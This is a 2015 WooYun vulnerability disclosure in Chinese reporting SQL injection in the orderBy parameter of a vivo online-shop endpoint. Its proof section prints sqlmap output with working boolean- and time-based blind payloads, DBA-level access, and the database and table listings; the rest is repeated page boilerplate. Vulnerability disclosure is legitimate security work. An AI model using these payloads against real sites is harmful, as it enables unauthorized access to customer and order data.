手机行业安全之vivo智能手机某站SQL注入(DBA权限)

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0130324

漏洞标题：手机行业安全之vivo智能手机某站SQL注入(DBA权限)

漏洞作者：路人甲

提交时间：2015-07-29 22:52

修复时间：2015-09-16 11:34

公开时间：2015-09-16 11:34

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：16

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-07-29：细节已通知厂商并且等待厂商处理中
2015-08-02：厂商已经确认，细节仅向厂商公开
2015-08-12：细节向核心白帽子及相关领域专家公开
2015-08-22：细节向普通白帽子公开
2015-09-01：细节向实习白帽子公开
2015-09-16：细节向公众公开

简要描述：

详细说明：

http://shop.vivo.com.cn/gallery-ajax_get_goods.html
post参数：
cat_id=&orderBy=*&scontent=n,e&showtype=grid&&virtual_cat_id=
orderBy参数存在注入

漏洞证明：

sqlmap identified the following injection points with a total of 522 HTTP(s) requests:
---
Parameter: #1* ((custom) POST)
    Type: boolean-based blind
    Title: MySQL >= 5.0 boolean-based blind - Parameter replace
    Payload: cat_id=&orderBy=(SELECT (CASE WHEN (2977=2977) THEN 2977 ELSE 2977*(SELECT 2977 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))&scontent=n,e&showtype=grid&&virtual_cat_id=
    Vector: (SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 time-based blind - Parameter replace
    Payload: cat_id=&orderBy=(SELECT (CASE WHEN (3089=3089) THEN SLEEP(5) ELSE 3089*(SELECT 3089 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))&scontent=n,e&showtype=grid&&virtual_cat_id=
    Vector: (SELECT (CASE WHEN ([INFERENCE]) THEN SLEEP([SLEEPTIME]) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))
---
web application technology: Nginx, PHP 5.3.25
back-end DBMS: MySQL 5.0
current user:    'vivo@192.168.1.%'
current database:    'vivo_store'
current user is DBA:    True
available databases [8]:
[*] cacti
[*] information_schema
[*] mysql
[*] performance_schema
[*] seckill
[*] test
[*] vivo04e9
[*] vivo_chk
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: #1* ((custom) POST)
    Type: boolean-based blind
    Title: MySQL >= 5.0 boolean-based blind - Parameter replace
    Payload: cat_id=&orderBy=(SELECT (CASE WHEN (2977=2977) THEN 2977 ELSE 2977*(SELECT 2977 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))&scontent=n,e&showtype=grid&&virtual_cat_id=
    Vector: (SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 time-based blind - Parameter replace
    Payload: cat_id=&orderBy=(SELECT (CASE WHEN (3089=3089) THEN SLEEP(5) ELSE 3089*(SELECT 3089 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))&scontent=n,e&showtype=grid&&virtual_cat_id=
    Vector: (SELECT (CASE WHEN ([INFERENCE]) THEN SLEEP([SLEEPTIME]) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))
---
web application technology: Nginx, PHP 5.3.25
back-end DBMS: MySQL 5.0
Database: vivo_store
[182 tables]
+-----------------------------------------+
| sdb_aftersales_return_product           |
| sdb_apiactionlog_apilog                 |
| sdb_b2c_archive_orders                  |
| sdb_b2c_brand                           |
| sdb_b2c_cart                            |
| sdb_b2c_cart_objects                    |
| sdb_b2c_college                         |
| sdb_b2c_comment_goods_point             |
| sdb_b2c_comment_goods_type              |
| sdb_b2c_contract_package                |
| sdb_b2c_contract_package_numbers        |
| sdb_b2c_counter                         |
| sdb_b2c_counter_attach                  |
| sdb_b2c_coupon_map                      |
| sdb_b2c_coupon_vivo                     |
| sdb_b2c_coupon_vivo_info                |
| sdb_b2c_coupon_vivo_list                |
| sdb_b2c_coupon_vivo_xshot               |
| sdb_b2c_coupons                         |
| sdb_b2c_delivery                        |
| sdb_b2c_delivery_items                  |
| sdb_b2c_dly_h_area                      |
| sdb_b2c_dlycorp                         |
| sdb_b2c_dlytype                         |
| sdb_b2c_flashlottery_award              |
| sdb_b2c_flashlottery_log                |
| sdb_b2c_flashlottery_winner             |
| sdb_b2c_goods                           |
| sdb_b2c_goods_cat                       |
| sdb_b2c_goods_contract_package          |
| sdb_b2c_goods_keywords                  |
| sdb_b2c_goods_lv_price                  |
| sdb_b2c_goods_promotion_ref             |
| sdb_b2c_goods_question                  |
| sdb_b2c_goods_rate                      |
| sdb_b2c_goods_spec_index                |
| sdb_b2c_goods_store_prompt              |
| sdb_b2c_goods_type                      |
| sdb_b2c_goods_type_props                |
| sdb_b2c_goods_type_props_value          |
| sdb_b2c_goods_type_spec                 |
| sdb_b2c_goods_virtual_cat               |
| sdb_b2c_lottery_award                   |
| sdb_b2c_lottery_log                     |
| sdb_b2c_lottery_winner                  |
| sdb_b2c_member_addrs                    |
| sdb_b2c_member_advance                  |
| sdb_b2c_member_college                  |
| sdb_b2c_member_comments                 |
| sdb_b2c_member_coupon                   |
| sdb_b2c_member_goods                    |
| sdb_b2c_member_limit_ip                 |
| sdb_b2c_member_lv                       |
| sdb_b2c_member_msg                      |
| sdb_b2c_member_point                    |
| sdb_b2c_member_pwdlog                   |
| sdb_b2c_member_secret                   |
| sdb_b2c_member_share_history            |
| sdb_b2c_member_systmpl                  |
| sdb_b2c_members                         |
| sdb_b2c_order_coupon_user               |
| sdb_b2c_order_delivery                  |
| sdb_b2c_order_items                     |
| sdb_b2c_order_log                       |
| sdb_b2c_order_objects                   |
| sdb_b2c_order_pmt                       |
| sdb_b2c_orders                          |
| sdb_b2c_preorders_sales_rule            |
| sdb_b2c_products                        |
| sdb_b2c_reship                          |
| sdb_b2c_reship_items                    |
| sdb_b2c_sales_rule_goods                |
| sdb_b2c_sales_rule_order                |
| sdb_b2c_sell_logs                       |
| sdb_b2c_shop                            |
| sdb_b2c_spec_values                     |
| sdb_b2c_specification                   |
| sdb_b2c_type_brand                      |
| sdb_b2c_xfive_coupon_log                |
| sdb_b2c_xfiveblue_preorder              |
| sdb_b2c_xfivepro_preorder               |
| sdb_base_app_content                    |
| sdb_base_apps                           |
| sdb_base_cache_expires                  |
| sdb_base_crontab                        |
| sdb_base_files                          |
| sdb_base_kvstore                        |
| sdb_base_network                        |
| sdb_base_queue                          |
| sdb_base_rpcnotify                      |
| sdb_base_rpcpoll                        |
| sdb_base_syscache_resources             |
| sdb_content_article_bodys               |
| sdb_content_article_indexs              |
| sdb_content_article_nodes               |
| sdb_couponlog_order_coupon_ref          |
| sdb_couponlog_order_coupon_user         |
| sdb_dbeav_meta_register                 |
| sdb_dbeav_meta_value_datetime           |
| sdb_dbeav_meta_value_decimal            |
| sdb_dbeav_meta_value_int                |
| sdb_dbeav_meta_value_longtext           |
| sdb_dbeav_meta_value_text               |
| sdb_dbeav_meta_value_varchar            |
| sdb_dbeav_recycle                       |
| sdb_desktop_filter                      |
| sdb_desktop_flow                        |
| sdb_desktop_hasrole                     |
| sdb_desktop_menus                       |
| sdb_desktop_recycle                     |
| sdb_desktop_role_flow                   |
| sdb_desktop_roles                       |
| sdb_desktop_tag                         |
| sdb_desktop_tag_rel                     |
| sdb_desktop_user_flow                   |
| sdb_desktop_users                       |
| sdb_ectools_analysis                    |
| sdb_ectools_analysis_logs               |
| sdb_ectools_currency                    |
| sdb_ectools_order_bills                 |
| sdb_ectools_payments                    |
| sdb_ectools_payments_log_callback       |
| sdb_ectools_payments_log_request        |
| sdb_ectools_refunds                     |
| sdb_ectools_regions                     |
| sdb_express_dly_center                  |
| sdb_express_print_tmpl                  |
| sdb_gift_cat                            |
| sdb_gift_ref                            |
| sdb_image_image                         |
| sdb_image_image_attach                  |
| sdb_importexport_task                   |
| sdb_logisticstrack_logistic_log         |
| sdb_operatorlog_logs                    |
| sdb_operatorlog_normallogs              |
| sdb_operatorlog_register                |
| sdb_pam_account                         |
| sdb_pam_auth                            |
| sdb_pam_bind_tag                        |
| sdb_pam_log                             |
| sdb_pointprofessional_member_point_task |
| sdb_preorderlog_order_preorder_user     |
| sdb_site_activities_survey              |
| sdb_site_activities_xfivepro            |
| sdb_site_explorers                      |
| sdb_site_index_page                     |
| sdb_site_link                           |
| sdb_site_lucky_draw                     |
| sdb_site_menus                          |
| sdb_site_modules                        |
| sdb_site_purchase                       |
| sdb_site_route_statics                  |
| sdb_site_seo                            |
| sdb_site_themes                         |
| sdb_site_themes_file                    |
| sdb_site_themes_tmpl                    |
| sdb_site_widgets                        |
| sdb_site_widgets_instance               |
| sdb_site_widgets_proinstance            |
| sdb_system_matrixset                    |
| sdb_system_queue_mysql                  |
| sdb_timedbuy_objitems                   |
| sdb_upimage_upimage                     |
| sdb_wap_explorers                       |
| sdb_wap_menus                           |
| sdb_wap_modules                         |
| sdb_wap_seo                             |
| sdb_wap_themes                          |
| sdb_wap_themes_file                     |
| sdb_wap_themes_tmpl                     |
| sdb_wap_widgets                         |
| sdb_wap_widgets_instance                |
| sdb_weixin_alert                        |
| sdb_weixin_bind                         |
| sdb_weixin_menus                        |
| sdb_weixin_message                      |
| sdb_weixin_message_image                |
| sdb_weixin_message_text                 |
| sdb_weixin_safeguard                    |
| tmp_53aa3e378d690                       |
| tmp_53bbb6d760ad5                       |
| tmp_53bbc08212460                       |
+-----------------------------------------+

修复方案：

参数过滤

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：20

确认时间：2015-08-02 11:33

厂商回复：

感谢关注

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0130324

漏洞标题：手机行业安全之vivo智能手机某站SQL注入(DBA权限)

相关厂商：vivo智能手机

漏洞作者：路人甲

提交时间：2015-07-29 22:52

修复时间：2015-09-16 11:34

公开时间：2015-09-16 11:34

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：16

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0130324

漏洞标题：手机行业安全之vivo智能手机某站SQL注入(DBA权限)

相关厂商：vivo智能手机

漏洞作者： 路人甲

提交时间：2015-07-29 22:52

修复时间：2015-09-16 11:34

公开时间：2015-09-16 11:34

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：16

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0130324"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云